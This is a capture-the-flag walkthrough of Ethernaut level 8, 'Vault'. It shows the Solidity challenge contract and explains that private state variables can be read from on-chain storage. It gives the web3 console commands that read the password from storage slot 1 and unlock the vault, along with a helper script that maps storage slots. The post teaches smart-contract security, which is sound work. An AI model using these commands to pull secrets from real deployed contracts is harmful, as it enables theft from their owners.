Naveen ⚡


Ethernaut Hacks Level 8: Vault

This is level 8 of the Ethernaut game.

Pre-requisites

Hack

Given contract:

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Vault {
  bool public locked;
  bytes32 private password;

  constructor(bytes32 _password) public {
    locked = true;
    password = _password;
  }

  function unlock(bytes32 _password) public {
    if (password == _password) {
      locked = false;
    }
  }
}

The player has to set locked to false.

The only way is to call unlock with the correct password.

Although the password state variable is private, anyone can still read a storage variable by determining its storage slot. Therefore sensitive information should not be stored on-chain, even if it is declared private.

Above, locked (a bool) occupies storage slot 0, and password, a bytes32 that needs a full 32-byte slot, is at storage slot 1 in Vault.
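Why the password lands in slot 1 follows from Solidity's layout rules: value-type state variables are placed in declaration order and packed into 32-byte slots. The sketch below is an added example, not code from the original post; it goes slightly beyond Vault by also handling packed variables. The names storageLayout, extractFromSlot and TYPE_SIZES are hypothetical helpers, and the slot values are constructed samples.

```javascript
// Added example: models how Solidity assigns storage slots to value-type
// state variables. Mappings and dynamic arrays (hashed slots) are out of scope.
const TYPE_SIZES = { bool: 1, uint8: 1, uint64: 8, uint128: 16,
  address: 20, uint256: 32, bytes32: 32 }; // sizes in bytes

function storageLayout(vars) {
  const layout = [];
  let slot = 0;   // index of the current 32-byte slot
  let offset = 0; // bytes already used in the current slot
  for (const { name, type, visibility } of vars) {
    const size = TYPE_SIZES[type];
    if (size === undefined) throw new Error(`unsupported type: ${type}`);
    // A variable that does not fit in the remaining bytes starts a new slot.
    if (offset + size > 32) { slot += 1; offset = 0; }
    layout.push({ name, type, visibility, slot, offset, size });
    offset += size;
  }
  return layout;
}

// Pull one variable's bytes out of a raw slot value (the hex string that
// eth_getStorageAt returns). Packed variables start at the low-order end.
function extractFromSlot(slotHex, entry) {
  const hex = slotHex.replace(/^0x/, "").padStart(64, "0");
  const end = 64 - entry.offset * 2;
  return "0x" + hex.slice(end - entry.size * 2, end);
}

// Vault's state variables, in declaration order.
const vaultLayout = storageLayout([
  { name: "locked", type: "bool", visibility: "public" },
  { name: "password", type: "bytes32", visibility: "private" },
]);

// Constructed sample slot contents (not taken from any real deployment).
const sampleSlots = ["0x" + "00".repeat(31) + "01", "0x" + "ab".repeat(32)];

// The visibility keyword never affects placement: every variable is listed.
for (const v of vaultLayout) {
  console.log(`${v.visibility} ${v.type} ${v.name}: slot ${v.slot},`,
    `offset ${v.offset} ->`, extractFromSlot(sampleSlots[v.slot], v));
}
```

Running the same function over a contract's declarations during review shows exactly which slot each private variable occupies, which makes any secret stored there easy to flag.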

Let's read it:

password = await web3.eth.getStorageAt(contract.address, 1)

Call unlock with password:

await contract.unlock(password)

Unlocked. Verify by:

await contract.locked() === false

And that's it.

Learned something awesome? Consider starring the GitHub repo 😄

and following me on Twitter here 🙏
